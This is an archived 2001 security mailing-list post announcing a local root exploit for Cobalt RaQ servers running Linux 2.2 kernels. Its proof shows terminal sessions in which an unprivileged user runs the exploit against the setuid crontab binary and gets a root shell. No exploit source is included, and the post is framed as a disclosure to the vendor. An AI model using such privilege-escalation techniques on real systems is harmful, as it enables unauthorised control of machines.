[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[cobalt-security] NEW local exploit
- Subject: [cobalt-security] NEW local exploit
- From: Peter Batenburg <peter@xxxxxxxxxx>
- Date: Sun, 15 Apr 2001 15:31:27 +0200
- List-id: Mailing list for users to address network security on Cobalt products. <cobalt-security.list.cobalt.com>
Hello,
Today i got a nice new local root exploit from a friend of mine. It gives
local root in an instant with every kernel and setuid executable available
(even 2.4)
Proof:
[host host]$ id
uid=131(host) gid=100(users) groups=100(users),111(site-adm),119(site8)
[host host]$ ./prak /usr/bin/crontab
bug exploited successfully.
enjoy!
bash# id
uid=0(root) gid=0(root) groups=100(users),111(site-adm),119(site8)
bash#
This is with a RaQ4r: Linux ********** 2.2.14C11 #2 Wed Jun 28 00:55:51 PDT
2000 i586 unknown
On a RaQ3: Linux ******** 2.2.14C10 #3 Wed Jun 21 15:05:10 JST 2000 i586
unknown
[bb@***** bb]$ id
uid=174(bb) gid=100(users) groups=100(users)
[bb@***** bb]$ ./prak /usr/bin/crontab
bug exploited successfully.
enjoy!
bash# id
uid=0(root) gid=0(root) groups=100(users)
bash#
Hopefully cobalt will release a patched kernel within some weeks.
People from cobalt can contact me for the source.